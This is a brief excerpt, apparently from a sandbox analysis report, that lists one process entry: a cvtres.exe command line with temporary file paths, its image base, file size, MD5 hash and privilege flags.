              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
              Imagebase:0x10c0000
              File size:43176 bytes
              MD5 hash:C09985AE74F0882F208D75DE27770DFA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
